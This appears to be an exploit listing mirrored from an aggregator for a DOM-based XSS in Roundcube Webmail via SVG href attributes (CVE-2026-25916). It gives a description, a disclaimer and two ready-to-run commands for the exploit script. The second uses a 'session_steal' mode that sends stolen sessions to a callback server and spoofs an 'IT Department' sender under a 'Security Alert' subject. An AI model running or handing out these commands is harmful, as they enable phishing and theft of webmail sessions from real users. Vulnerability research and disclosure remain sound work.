Share
## https://sploitus.com/exploit?id=B7141A99-3A8E-598A-ADC8-C802955FA311
# CVE-2026-25916: Roundcube Webmail DOM XSS Exploit
## ๐ Exploit Information
**Exploit Title:** Roundcube Webmail DOM XSS via SVG href (CVE-2026-25916)
**Author:** Mohammed Idrees Banyamer
**Contact:** [GitHub @mbanyamer](https://github.com/mbanyamer) | [Instagram @banyamer_security](https://instagram.com/banyamer_security)
**Country:** Jordan
**Date:** February 9, 2026
**CVE:** CVE-2026-25916
**Type:** DOM-based Cross-Site Scripting (XSS)
**Platform:** Web Application
**Tested on:** Roundcube 1.6.8, Ubuntu 22.04
**CVSS Score:** 6.1 (Medium)
## ๐จ Legal Disclaimer
> **โ ๏ธ WARNING:** This exploit is for **educational and authorized testing purposes only**.
> Use only on systems you own or have explicit written permission to test.
> The author is not responsible for any misuse or illegal activities.
## ๐ Vulnerability Description
Roundcube Webmail versions before 1.6.9 contain a DOM-based XSS vulnerability in SVG handling. The application fails to properly sanitize `href` and `xlink:href` attributes in SVG elements, allowing JavaScript execution via specially crafted emails.
**Affected Versions:** Roundcube Webmail
```bash
python3 cve-2026-25916.py -s smtp.gmail.com -p 587 -u your_email@gmail.com -w your_password -r victim@company.com
```
```bash
python3 cve-2026-25916.py \
-s smtp.gmail.com \
-p 587 \
-u attacker@gmail.com \
-w app_password \
-r victim@company.com \
-t session_steal \
--callback https://yourserver.com/collect \
--subject "Security Alert" \
--from-name "IT Department"